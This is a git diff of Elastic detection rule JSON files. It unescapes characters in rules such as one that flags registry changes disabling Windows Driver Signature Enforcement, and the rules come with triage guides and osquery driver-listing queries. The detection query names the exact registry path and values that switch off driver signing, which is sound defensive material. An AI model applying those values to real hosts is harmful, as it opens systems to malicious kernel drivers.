a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_105.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_105.json index 44ac208a90b..d3faef16ade 100644 --- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_105.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_106.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_106.json index 79bf1144174..d566504d116 100644 --- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_106.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_107.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_107.json index c5848e0b096..594927b14af 100644 --- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_107.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_108.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_108.json index 4f4d3cdc0d8..e1f9dda38ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_108.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_2.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_2.json index 74e35ab2f09..6b4bd43e5d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_3.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_3.json index ff564ab3bbf..99b131388e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_3.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Registry", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_4.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_4.json index bd4da86ead7..943b7b9b1bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_4.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Registry", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", "related_integrations": [ { @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_5.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_5.json index 51d05d2fee9..e5ed70ac39c 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_5.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Code Signing Policy Modification Through Registry", - "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_6.json 